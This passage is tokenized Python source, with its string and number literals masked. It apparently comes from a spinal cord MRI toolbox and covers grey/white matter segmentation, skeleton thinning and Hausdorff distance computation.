) <EOL> for k in range ( precision - <NUM_LIT:2> * int ( precision * coeff ) ) : <EOL> adjacent_wm_seg . append ( target_slice . wm_seg_M ) <EOL> adjacent_gm_seg . append ( target_slice . gm_seg_M ) <EOL> adjacent_wm_seg = np . asarray ( adjacent_wm_seg ) <EOL> adjacent_gm_seg = np . asarray ( adjacent_gm_seg ) <EOL> new_wm_seg = compute_majority_vote_mean_seg ( adjacent_wm_seg , type = self . model . param . res_type , threshold = <NUM_LIT> ) <EOL> new_gm_seg = compute_majority_vote_mean_seg ( adjacent_gm_seg , type = self . model . param . res_type ) <EOL> target_slice . set ( wm_seg_m = new_wm_seg ) <EOL> target_slice . 
set ( gm_seg_m = new_gm_seg ) <EOL> def plot_projected_dic ( self , nb_modes = <NUM_LIT:3> , to_highlight = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> self . model . pca . plot_projected_dic ( nb_modes = nb_modes , target_coord = self . coord_projected_target , target_levels = [ t_slice . level for t_slice in self . target ] ) if self . coord_projected_target is not None else self . model . pca . plot_projected_dic ( nb_modes = nb_modes ) <EOL> if to_highlight == '<STR_LIT:all>' : <EOL> for i in range ( len ( self . target ) ) : <EOL> self . model . pca . plot_projected_dic ( nb_modes = nb_modes , target_coord = self . coord_projected_target , target_levels = [ t_slice . level for t_slice in self . target ] , to_highlight = ( i , self . selected_k_slices [ i ] ) ) <EOL> else : <EOL> self . model . pca . plot_projected_dic ( nb_modes = nb_modes , target_coord = self . coord_projected_target , target_levels = [ t_slice . level for t_slice in self . target ] , to_highlight = ( to_highlight , self . selected_k_slices [ to_highlight ] ) ) if self . coord_projected_target is not None else self . model . pca . plot_projected_dic ( ) <EOL> def save_selected_slices ( self , target_name ) : <EOL> slice_levels = np . asarray ( [ ( dic_slice . id , self . model . dictionary . level_label [ dic_slice . level ] ) for dic_slice in self . model . dictionary . slices ] ) <EOL> fic_selected_slices = open ( target_name + '<STR_LIT>' , '<STR_LIT:w>' ) <EOL> if self . target_dim == <NUM_LIT:2> : <EOL> fic_selected_slices . write ( str ( slice_levels [ self . selected_k_slices . reshape ( self . model . dictionary . J , ) ] ) ) <EOL> elif self . target_dim == <NUM_LIT:3> : <EOL> for target_slice in self . target : <EOL> fic_selected_slices . write ( '<STR_LIT>' + str ( target_slice . id ) + '<STR_LIT>' + str ( slice_levels [ self . selected_k_slices [ target_slice . id ] ] ) + '<STR_LIT:\n>' ) <EOL> fic_selected_slices . 
close ( ) <EOL> class GMsegSupervisedMethod ( ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , target_fname , level_fname , model , gm_seg_param = None ) : <EOL> self . model = model <EOL> sct . printv ( '<STR_LIT>' , verbose = gm_seg_param . verbose , type = '<STR_LIT>' ) <EOL> self . target_image = Image ( target_fname ) <EOL> original_hdr = self . target_image . hdr <EOL> level_im = None <EOL> if level_fname is not None : <EOL> if len ( level_fname ) < <NUM_LIT:3> : <EOL> level_im = level_fname <EOL> else : <EOL> level_im = Image ( level_fname ) <EOL> if level_im is not None : <EOL> self . target_seg_methods = TargetSegmentationPairwise ( self . model , target_image = self . target_image , levels_image = level_im ) <EOL> else : <EOL> self . target_seg_methods = TargetSegmentationPairwise ( self . model , target_image = self . target_image ) <EOL> suffix = '<STR_LIT:_>' <EOL> suffix += '<STR_LIT:_>' + gm_seg_param . res_type <EOL> for transfo in self . model . dictionary . coregistration_transfos : <EOL> suffix += '<STR_LIT:_>' + transfo <EOL> if self . model . param . use_levels : <EOL> suffix += '<STR_LIT>' + str ( self . model . param . weight_gamma ) <EOL> else : <EOL> suffix += '<STR_LIT>' <EOL> if self . model . param . z_regularisation : <EOL> suffix += '<STR_LIT>' <EOL> name_res_wmseg = sct . extract_fname ( target_fname ) [ <NUM_LIT:1> ] + '<STR_LIT>' + suffix <EOL> name_res_gmseg = sct . extract_fname ( target_fname ) [ <NUM_LIT:1> ] + '<STR_LIT>' + suffix <EOL> if len ( self . target_seg_methods . target ) == <NUM_LIT:1> : <EOL> self . res_wm_seg = Image ( param = np . asarray ( self . target_seg_methods . target [ <NUM_LIT:0> ] . wm_seg ) , absolutepath = name_res_wmseg + '<STR_LIT>' ) <EOL> self . res_gm_seg = Image ( param = np . asarray ( self . target_seg_methods . target [ <NUM_LIT:0> ] . gm_seg ) , absolutepath = name_res_gmseg + '<STR_LIT>' ) <EOL> else : <EOL> self . res_wm_seg = Image ( param = np . asarray ( [ target_slice . 
wm_seg for target_slice in self . target_seg_methods . target ] ) , absolutepath = name_res_wmseg + '<STR_LIT>' ) <EOL> self . res_gm_seg = Image ( param = np . asarray ( [ target_slice . gm_seg for target_slice in self . target_seg_methods . target ] ) , absolutepath = name_res_gmseg + '<STR_LIT>' ) <EOL> self . res_wm_seg . hdr = original_hdr <EOL> self . res_wm_seg . file_name = name_res_wmseg <EOL> self . res_wm_seg . save ( type = '<STR_LIT>' ) <EOL> self . res_gm_seg . hdr = original_hdr <EOL> self . res_gm_seg . file_name = name_res_gmseg <EOL> self . res_gm_seg . save ( type = '<STR_LIT>' ) <EOL> self . corrected_wm_seg = correct_wmseg ( self . res_gm_seg , self . target_image , name_res_wmseg , original_hdr ) <EOL> def show ( self ) : <EOL> sct . printv ( '<STR_LIT>' ) <EOL> self . model . pca . show_all_modes ( ) <EOL> sct . printv ( '<STR_LIT>' ) <EOL> self . target_seg_methods . plot_projected_dic ( nb_modes = <NUM_LIT:3> ) <EOL> sct . printv ( '<STR_LIT>' ) <EOL> self . model . pca . show_mode_variation ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> param = Param ( ) <EOL> input_target_fname = None <EOL> input_level_fname = None <EOL> if param . debug : <EOL> print '<STR_LIT>' <EOL> fname_input = param . path_dictionary + "<STR_LIT>" <EOL> fname_input = param . path_dictionary + "<STR_LIT>" <EOL> else : <EOL> param_default = Param ( ) <EOL> parser = Parser ( __file__ ) <EOL> parser . usage . set_description ( '<STR_LIT>' ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT:file>" , <EOL> description = "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> mandatory = False , <EOL> example = '<STR_LIT>' ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = True , <EOL> example = '<STR_LIT>' ) <EOL> parser . 
add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = True , <EOL> example = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT:str>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> example = '<STR_LIT>' ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = [ [ '<STR_LIT:U+002C>' ] , '<STR_LIT:str>' ] , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = [ '<STR_LIT>' ] , <EOL> example = [ '<STR_LIT>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = '<STR_LIT:float>' , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = <NUM_LIT> , <EOL> example = <NUM_LIT> ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = <NUM_LIT:1> , <EOL> example = [ '<STR_LIT:0>' , '<STR_LIT:1>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = <NUM_LIT:0> , <EOL> example = [ '<STR_LIT:0>' , '<STR_LIT:1>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = <NUM_LIT:1> , <EOL> example = [ '<STR_LIT:0>' , '<STR_LIT:1>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = <NUM_LIT:0> , <EOL> example = [ '<STR_LIT:0>' , '<STR_LIT:1>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = <NUM_LIT:0> , <EOL> example = [ '<STR_LIT:0>' , '<STR_LIT:1>' ] ) <EOL> parser . 
add_option ( name = "<STR_LIT>" , <EOL> type_value = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = <NUM_LIT:0> , <EOL> example = [ '<STR_LIT:0>' , '<STR_LIT:1>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = '<STR_LIT>' , <EOL> example = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = <NUM_LIT:0> , <EOL> example = [ '<STR_LIT:0>' , '<STR_LIT:1>' , '<STR_LIT:2>' ] ) <EOL> arguments = parser . parse ( sys . argv [ <NUM_LIT:1> : ] ) <EOL> param . path_dictionary = arguments [ "<STR_LIT>" ] <EOL> param . todo_model = arguments [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in arguments : <EOL> input_target_fname = arguments [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in arguments : <EOL> param . reg = arguments [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in arguments : <EOL> input_level_fname = arguments [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in arguments : <EOL> param . weight_gamma = arguments [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in arguments : <EOL> param . use_levels = bool ( int ( arguments [ "<STR_LIT>" ] ) ) <EOL> if "<STR_LIT>" in arguments : <EOL> param . weight_label_fusion = bool ( int ( arguments [ "<STR_LIT>" ] ) ) <EOL> if "<STR_LIT>" in arguments : <EOL> param . mode_weight_similarity = bool ( int ( arguments [ "<STR_LIT>" ] ) ) <EOL> if "<STR_LIT>" in arguments : <EOL> param . z_regularisation = bool ( int ( arguments [ "<STR_LIT>" ] ) ) <EOL> if "<STR_LIT>" in arguments : <EOL> param . target_denoising = bool ( int ( arguments [ "<STR_LIT>" ] ) ) <EOL> if "<STR_LIT>" in arguments : <EOL> param . first_reg = bool ( int ( arguments [ "<STR_LIT>" ] ) ) <EOL> if "<STR_LIT>" in arguments : <EOL> param . 
res_type = arguments [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in arguments : <EOL> param . verbose = int ( arguments [ "<STR_LIT>" ] ) <EOL> model = Model ( model_param = param , k = <NUM_LIT> ) <EOL> if input_target_fname is not None : <EOL> gm_seg_method = GMsegSupervisedMethod ( input_target_fname , input_level_fname , model , gm_seg_param = param ) <EOL> print param . verbose == <NUM_LIT:2> <EOL> if param . verbose == <NUM_LIT:2> : <EOL> gm_seg_method . show ( ) </s>
<s> import commands , sys , os <EOL> status , path_sct = commands . getstatusoutput ( '<STR_LIT>' ) <EOL> sys . path . append ( path_sct + '<STR_LIT>' ) <EOL> import nibabel <EOL> from scipy . misc import imsave <EOL> from sct_utils import extract_fname <EOL> os . chdir ( '<STR_LIT>' ) <EOL> dirpath = [ x [ <NUM_LIT:0> ] for x in os . walk ( '<STR_LIT>' ) ] <EOL> dirnames = [ x [ <NUM_LIT:1> ] for x in os . walk ( '<STR_LIT>' ) ] <EOL> filenames = [ x [ <NUM_LIT:2> ] for x in os . walk ( '<STR_LIT>' ) ] <EOL> L = len ( dirpath ) <EOL> dirpath_simplified = [ ] <EOL> for i in range ( <NUM_LIT:0> , L ) : <EOL> if dirpath [ i ] . find ( '<STR_LIT>' ) == - <NUM_LIT:1> : <EOL> dirpath_simplified . append ( dirpath [ i ] ) <EOL> for i in range ( <NUM_LIT:3> , L , <NUM_LIT:4> ) : <EOL> files = os . listdir ( dirpath [ i ] ) <EOL> os . chdir ( dirpath [ i ] ) <EOL> for file in files : <EOL> if file == '<STR_LIT>' or file == '<STR_LIT>' : <EOL> path , name , ext = extract_fname ( file ) <EOL> uploaded_file = nibabel . load ( file ) <EOL> data = uploaded_file . get_data ( ) <EOL> middle_sag = round ( data . shape [ <NUM_LIT:1> ] / <NUM_LIT:2> ) <EOL> data_sagitale = data [ : , middle_sag , : ] <EOL> imsave ( '<STR_LIT>' + name + '<STR_LIT>' , data_sagitale ) <EOL> os . chdir ( '<STR_LIT>' ) </s>
<s> import os , sys , commands <EOL> status , path_sct = commands . getstatusoutput ( '<STR_LIT>' ) <EOL> sys . path . append ( path_sct + '<STR_LIT>' ) <EOL> from msct_register_landmarks import getRigidTransformFromImages <EOL> from msct_register_regularized import generate_warping_field <EOL> os . chdir ( '<STR_LIT>' ) <EOL> rotation_matrix , translation_array = getRigidTransformFromImages ( '<STR_LIT>' , '<STR_LIT>' , constraints = '<STR_LIT>' , metric = '<STR_LIT>' , center_rotation = '<STR_LIT>' ) <EOL> print '<STR_LIT>' + str ( rotation_matrix [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ) + '<STR_LIT:U+002CU+0020>' + str ( rotation_matrix [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) </s>
<s> from commands import getstatusoutput <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT>' <EOL> status , output = getstatusoutput ( '<STR_LIT>' ) <EOL> if status : <EOL> print '<STR_LIT>' + output <EOL> else : <EOL> print output <EOL> print '<STR_LIT>' <EOL> status , output = getstatusoutput ( '<STR_LIT>' ) <EOL> if status : <EOL> print '<STR_LIT>' + output <EOL> else : <EOL> print output </s>
<s> import sys <EOL> import time <EOL> import os <EOL> import numpy as np <EOL> import sct_utils as sct <EOL> from msct_image import Image , get_dimension <EOL> from sct_image import set_orientation <EOL> from msct_parser import Parser <EOL> import msct_gmseg_utils as sct_gm <EOL> class Param : <EOL> def __init__ ( self ) : <EOL> self . debug = <NUM_LIT:0> <EOL> self . thinning = True <EOL> self . verbose = <NUM_LIT:1> <EOL> class Thinning : <EOL> def __init__ ( self , im , v = <NUM_LIT:1> ) : <EOL> sct . printv ( '<STR_LIT>' , v , '<STR_LIT>' ) <EOL> self . image = im <EOL> self . image . data = bin_data ( self . image . data ) <EOL> self . dim_im = len ( self . image . data . shape ) <EOL> if self . dim_im == <NUM_LIT:2> : <EOL> self . thinned_image = Image ( param = self . zhang_suen ( self . image . data ) , absolutepath = self . image . path + self . image . file_name + '<STR_LIT>' + self . image . ext , hdr = self . image . hdr ) <EOL> elif self . dim_im == <NUM_LIT:3> : <EOL> assert self . image . orientation == '<STR_LIT>' <EOL> thinned_data = np . asarray ( [ self . zhang_suen ( im_slice ) for im_slice in self . image . data ] ) <EOL> self . thinned_image = Image ( param = thinned_data , absolutepath = self . image . path + self . image . file_name + '<STR_LIT>' + self . image . ext , hdr = self . image . hdr ) <EOL> def get_neighbours ( self , x , y , image ) : <EOL> """<STR_LIT>""" <EOL> x_1 , y_1 , x1 , y1 = x - <NUM_LIT:1> , y - <NUM_LIT:1> , x + <NUM_LIT:1> , y + <NUM_LIT:1> <EOL> neighbours = [ image [ x_1 ] [ y ] , image [ x_1 ] [ y1 ] , image [ x ] [ y1 ] , image [ x1 ] [ y1 ] , <EOL> image [ x1 ] [ y ] , image [ x1 ] [ y_1 ] , image [ x ] [ y_1 ] , image [ x_1 ] [ y_1 ] ] <EOL> return neighbours <EOL> def transitions ( self , neighbours ) : <EOL> """<STR_LIT>""" <EOL> n = neighbours + neighbours [ <NUM_LIT:0> : <NUM_LIT:1> ] <EOL> s = np . 
sum ( ( n1 , n2 ) == ( <NUM_LIT:0> , <NUM_LIT:1> ) for n1 , n2 in zip ( n , n [ <NUM_LIT:1> : ] ) ) <EOL> return s <EOL> def zhang_suen ( self , image ) : <EOL> """<STR_LIT>""" <EOL> image_thinned = image . copy ( ) <EOL> changing1 = changing2 = <NUM_LIT:1> <EOL> while changing1 or changing2 : <EOL> changing1 = [ ] <EOL> max = len ( image_thinned ) - <NUM_LIT:1> <EOL> pass_list = [ <NUM_LIT:1> , max ] <EOL> for x , y in non_zero_coord ( image_thinned ) : <EOL> if x not in pass_list and y not in pass_list : <EOL> P2 , P3 , P4 , P5 , P6 , P7 , P8 , P9 = n = self . get_neighbours ( x , y , image_thinned ) <EOL> if ( <NUM_LIT:2> <= sum ( n ) <= <NUM_LIT:6> and <EOL> P2 * P4 * P6 == <NUM_LIT:0> and <EOL> P4 * P6 * P8 == <NUM_LIT:0> and <EOL> self . transitions ( n ) == <NUM_LIT:1> ) : <EOL> changing1 . append ( ( x , y ) ) <EOL> for x , y in changing1 : <EOL> image_thinned [ x ] [ y ] = <NUM_LIT:0> <EOL> changing2 = [ ] <EOL> for x , y in non_zero_coord ( image_thinned ) : <EOL> if x not in pass_list and y not in pass_list : <EOL> P2 , P3 , P4 , P5 , P6 , P7 , P8 , P9 = n = self . get_neighbours ( x , y , image_thinned ) <EOL> if ( <NUM_LIT:2> <= sum ( n ) <= <NUM_LIT:6> and <EOL> P2 * P4 * P8 == <NUM_LIT:0> and <EOL> P2 * P6 * P8 == <NUM_LIT:0> and <EOL> self . transitions ( n ) == <NUM_LIT:1> ) : <EOL> changing2 . append ( ( x , y ) ) <EOL> for x , y in changing2 : <EOL> image_thinned [ x ] [ y ] = <NUM_LIT:0> <EOL> return image_thinned <EOL> class HausdorffDistance : <EOL> def __init__ ( self , data1 , data2 , v = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> sct . printv ( '<STR_LIT>' , v , '<STR_LIT>' ) <EOL> self . data1 = bin_data ( data1 ) <EOL> self . data2 = bin_data ( data2 ) <EOL> self . min_distances_1 = self . relative_hausdorff_dist ( self . data1 , self . data2 , v ) <EOL> self . min_distances_2 = self . relative_hausdorff_dist ( self . data2 , self . data1 , v ) <EOL> self . h1 = np . max ( self . min_distances_1 ) <EOL> self . h2 = np . max ( self . 
min_distances_2 ) <EOL> self . H = max ( self . h1 , self . h2 ) <EOL> def relative_hausdorff_dist ( self , dat1 , dat2 , v = <NUM_LIT:1> ) : <EOL> h = np . zeros ( dat1 . shape ) <EOL> nz_coord_1 = non_zero_coord ( dat1 ) <EOL> nz_coord_2 = non_zero_coord ( dat2 ) <EOL> if len ( nz_coord_1 ) != <NUM_LIT:0> and len ( nz_coord_2 ) != <NUM_LIT:0> : <EOL> for x1 , y1 in nz_coord_1 : <EOL> d_p1_dat2 = [ ] <EOL> p1 = np . asarray ( [ x1 , y1 ] ) <EOL> for x2 , y2 in nz_coord_2 : <EOL> p2 = np . asarray ( [ x2 , y2 ] ) <EOL> d_p1_dat2 . append ( np . linalg . norm ( p1 - p2 ) ) <EOL> h [ x1 , y1 ] = min ( d_p1_dat2 ) <EOL> else : <EOL> sct . printv ( '<STR_LIT>' , v , '<STR_LIT>' ) <EOL> return h <EOL> class ComputeDistances : <EOL> def __init__ ( self , im1 , im2 = None , param = None ) : <EOL> self . im1 = im1 <EOL> self . im2 = im2 <EOL> self . dim_im = len ( self . im1 . data . shape ) <EOL> self . dim_pix = <NUM_LIT:0> <EOL> self . distances = None <EOL> self . res = '<STR_LIT>' <EOL> self . param = param <EOL> self . dist1_distribution = None <EOL> self . dist2_distribution = None <EOL> if self . dim_im == <NUM_LIT:3> : <EOL> self . orientation1 = self . im1 . orientation <EOL> if self . orientation1 != '<STR_LIT>' : <EOL> self . im1 = set_orientation ( self . im1 , '<STR_LIT>' ) <EOL> if self . im2 is not None : <EOL> self . orientation2 = self . im2 . orientation <EOL> if self . orientation2 != '<STR_LIT>' : <EOL> self . im2 = set_orientation ( self . im2 , '<STR_LIT>' ) <EOL> if self . param . thinning : <EOL> self . thinning1 = Thinning ( self . im1 , self . param . verbose ) <EOL> self . thinning1 . thinned_image . save ( ) <EOL> if self . im2 is not None : <EOL> self . thinning2 = Thinning ( self . im2 , self . param . verbose ) <EOL> self . thinning2 . thinned_image . save ( ) <EOL> if self . dim_im == <NUM_LIT:2> and self . im2 is not None : <EOL> self . compute_dist_2im_2d ( ) <EOL> if self . dim_im == <NUM_LIT:3> : <EOL> if self . 
im2 is None : <EOL> self . compute_dist_1im_3d ( ) <EOL> else : <EOL> self . compute_dist_2im_3d ( ) <EOL> if self . dim_im == <NUM_LIT:2> and self . distances is not None : <EOL> self . dist1_distribution = self . distances . min_distances_1 [ np . nonzero ( self . distances . min_distances_1 ) ] <EOL> self . dist2_distribution = self . distances . min_distances_2 [ np . nonzero ( self . distances . min_distances_2 ) ] <EOL> if self . dim_im == <NUM_LIT:3> : <EOL> self . dist1_distribution = [ ] <EOL> self . dist2_distribution = [ ] <EOL> for d in self . distances : <EOL> self . dist1_distribution . append ( d . min_distances_1 [ np . nonzero ( d . min_distances_1 ) ] ) <EOL> self . dist2_distribution . append ( d . min_distances_2 [ np . nonzero ( d . min_distances_2 ) ] ) <EOL> self . res = '<STR_LIT>' <EOL> for i , d in enumerate ( self . distances ) : <EOL> med1 = np . median ( self . dist1_distribution [ i ] ) <EOL> med2 = np . median ( self . dist2_distribution [ i ] ) <EOL> if self . im2 is None : <EOL> self . res += '<STR_LIT>' + str ( i ) + '<STR_LIT>' + str ( i + <NUM_LIT:1> ) + '<STR_LIT>' + str ( d . H * self . dim_pix ) + '<STR_LIT>' + str ( med1 * self . dim_pix ) + '<STR_LIT>' + str ( med2 * self . dim_pix ) + '<STR_LIT>' <EOL> else : <EOL> self . res += '<STR_LIT>' + str ( i ) + '<STR_LIT>' + str ( d . H * self . dim_pix ) + '<STR_LIT>' + str ( med1 * self . dim_pix ) + '<STR_LIT>' + str ( med2 * self . dim_pix ) + '<STR_LIT>' <EOL> sct . printv ( '<STR_LIT>' + <EOL> self . res , self . param . verbose , '<STR_LIT>' ) <EOL> if self . param . verbose == <NUM_LIT:2> : <EOL> self . show_results ( ) <EOL> def compute_dist_2im_2d ( self ) : <EOL> nx1 , ny1 , nz1 , nt1 , px1 , py1 , pz1 , pt1 = get_dimension ( self . im1 ) <EOL> nx2 , ny2 , nz2 , nt2 , px2 , py2 , pz2 , pt2 = get_dimension ( self . im2 ) <EOL> assert px1 == px2 and py1 == py2 and px1 == py1 <EOL> self . dim_pix = py1 <EOL> if self . param . thinning : <EOL> dat1 = self . thinning1 . 
thinned_image . data <EOL> dat2 = self . thinning2 . thinned_image . data <EOL> else : <EOL> dat1 = bin_data ( self . im1 . data ) <EOL> dat2 = bin_data ( self . im2 . data ) <EOL> self . distances = HausdorffDistance ( dat1 , dat2 , self . param . verbose ) <EOL> self . res = '<STR_LIT>' + str ( self . distances . H * self . dim_pix ) + '<STR_LIT>' '<STR_LIT>' + str ( self . distances . h1 * self . dim_pix ) + '<STR_LIT>' '<STR_LIT>' + str ( self . distances . h2 * self . dim_pix ) + '<STR_LIT>' <EOL> def compute_dist_1im_3d ( self ) : <EOL> nx1 , ny1 , nz1 , nt1 , px1 , py1 , pz1 , pt1 = get_dimension ( self . im1 ) <EOL> self . dim_pix = py1 <EOL> if self . param . thinning : <EOL> dat1 = self . thinning1 . thinned_image . data <EOL> else : <EOL> dat1 = bin_data ( self . im1 . data ) <EOL> self . distances = [ ] <EOL> for i , dat_slice in enumerate ( dat1 [ : - <NUM_LIT:1> ] ) : <EOL> self . distances . append ( HausdorffDistance ( bin_data ( dat_slice ) , bin_data ( dat1 [ i + <NUM_LIT:1> ] ) , self . param . verbose ) ) <EOL> def compute_dist_2im_3d ( self ) : <EOL> nx1 , ny1 , nz1 , nt1 , px1 , py1 , pz1 , pt1 = get_dimension ( self . im1 ) <EOL> nx2 , ny2 , nz2 , nt2 , px2 , py2 , pz2 , pt2 = get_dimension ( self . im2 ) <EOL> assert round ( pz1 , <NUM_LIT:5> ) == round ( pz2 , <NUM_LIT:5> ) and round ( py1 , <NUM_LIT:5> ) == round ( py2 , <NUM_LIT:5> ) <EOL> assert nx1 == nx2 <EOL> self . dim_pix = py1 <EOL> if self . param . thinning : <EOL> dat1 = self . thinning1 . thinned_image . data <EOL> dat2 = self . thinning2 . thinned_image . data <EOL> else : <EOL> dat1 = bin_data ( self . im1 . data ) <EOL> dat2 = bin_data ( self . im2 . data ) <EOL> self . distances = [ ] <EOL> for slice1 , slice2 in zip ( dat1 , dat2 ) : <EOL> self . distances . append ( HausdorffDistance ( slice1 , slice2 , self . param . verbose ) ) <EOL> def show_results ( self ) : <EOL> import seaborn as sns <EOL> import matplotlib . pyplot as plt <EOL> import pandas as pd <EOL> plt . 
hold ( True ) <EOL> sns . set ( style = "<STR_LIT>" , palette = "<STR_LIT>" , color_codes = True ) <EOL> plt . figure ( figsize = ( <NUM_LIT> , <NUM_LIT:20> ) ) <EOL> data_dist = { "<STR_LIT>" : [ ] , "<STR_LIT:image>" : [ ] , "<STR_LIT>" : [ ] } <EOL> if self . dim_im == <NUM_LIT:2> : <EOL> data_dist [ "<STR_LIT>" ] . append ( [ dist * self . dim_pix for dist in self . dist1_distribution ] ) <EOL> data_dist [ "<STR_LIT:image>" ] . append ( len ( self . dist1_distribution ) * [ <NUM_LIT:1> ] ) <EOL> data_dist [ "<STR_LIT>" ] . append ( len ( self . dist1_distribution ) * [ <NUM_LIT:0> ] ) <EOL> data_dist [ "<STR_LIT>" ] . append ( [ dist * self . dim_pix for dist in self . dist2_distribution ] ) <EOL> data_dist [ "<STR_LIT:image>" ] . append ( len ( self . dist2_distribution ) * [ <NUM_LIT:2> ] ) <EOL> data_dist [ "<STR_LIT>" ] . append ( len ( self . dist2_distribution ) * [ <NUM_LIT:0> ] ) <EOL> if self . dim_im == <NUM_LIT:3> : <EOL> for i in range ( len ( self . distances ) ) : <EOL> data_dist [ "<STR_LIT>" ] . append ( [ dist * self . dim_pix for dist in self . dist1_distribution [ i ] ] ) <EOL> data_dist [ "<STR_LIT:image>" ] . append ( len ( self . dist1_distribution [ i ] ) * [ <NUM_LIT:1> ] ) <EOL> data_dist [ "<STR_LIT>" ] . append ( len ( self . dist1_distribution [ i ] ) * [ i ] ) <EOL> data_dist [ "<STR_LIT>" ] . append ( [ dist * self . dim_pix for dist in self . dist2_distribution [ i ] ] ) <EOL> data_dist [ "<STR_LIT:image>" ] . append ( len ( self . dist2_distribution [ i ] ) * [ <NUM_LIT:2> ] ) <EOL> data_dist [ "<STR_LIT>" ] . append ( len ( self . dist2_distribution [ i ] ) * [ i ] ) <EOL> for k in data_dist . keys ( ) : <EOL> data_dist [ k ] = [ item for sublist in data_dist [ k ] for item in sublist ] <EOL> data_dist = pd . DataFrame ( data_dist ) <EOL> sns . violinplot ( x = "<STR_LIT>" , y = "<STR_LIT>" , hue = "<STR_LIT:image>" , data = data_dist , split = True , inner = "<STR_LIT>" , cut = <NUM_LIT:0> ) <EOL> plt . 
savefig ( '<STR_LIT>' ) <EOL> def bin_data ( data ) : <EOL> return np . asarray ( ( data > <NUM_LIT:0> ) . astype ( int ) ) <EOL> def non_zero_coord ( data ) : <EOL> dim = len ( data . shape ) <EOL> if dim == <NUM_LIT:3> : <EOL> X , Y , Z = ( data > <NUM_LIT:0> ) . nonzero ( ) <EOL> list_coordinates = [ ( X [ i ] , Y [ i ] , Z [ i ] ) for i in range ( <NUM_LIT:0> , len ( X ) ) ] <EOL> elif dim == <NUM_LIT:2> : <EOL> X , Y = ( data > <NUM_LIT:0> ) . nonzero ( ) <EOL> list_coordinates = [ ( X [ i ] , Y [ i ] ) for i in range ( <NUM_LIT:0> , len ( X ) ) ] <EOL> return list_coordinates <EOL> def get_parser ( ) : <EOL> parser = Parser ( __file__ ) <EOL> parser . usage . set_description ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT:file>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = True , <EOL> example = '<STR_LIT>' ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT:file>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = None , <EOL> example = '<STR_LIT>' ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = None , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> deprecated_by = '<STR_LIT>' ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = <NUM_LIT:1> , <EOL> example = [ '<STR_LIT:0>' , '<STR_LIT:1>' ] ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = None , <EOL> description = "<STR_LIT>" , <EOL> deprecated_by = "<STR_LIT>" , <EOL> mandatory = False ) <EOL> parser . add_option ( name = "<STR_LIT>" , <EOL> type_value = "<STR_LIT:float>" , <EOL> description = "<STR_LIT>" , <EOL> mandatory = False , <EOL> default_value = <NUM_LIT:0.1> , <EOL> example = <NUM_LIT:0.5> ) <EOL> parser . 
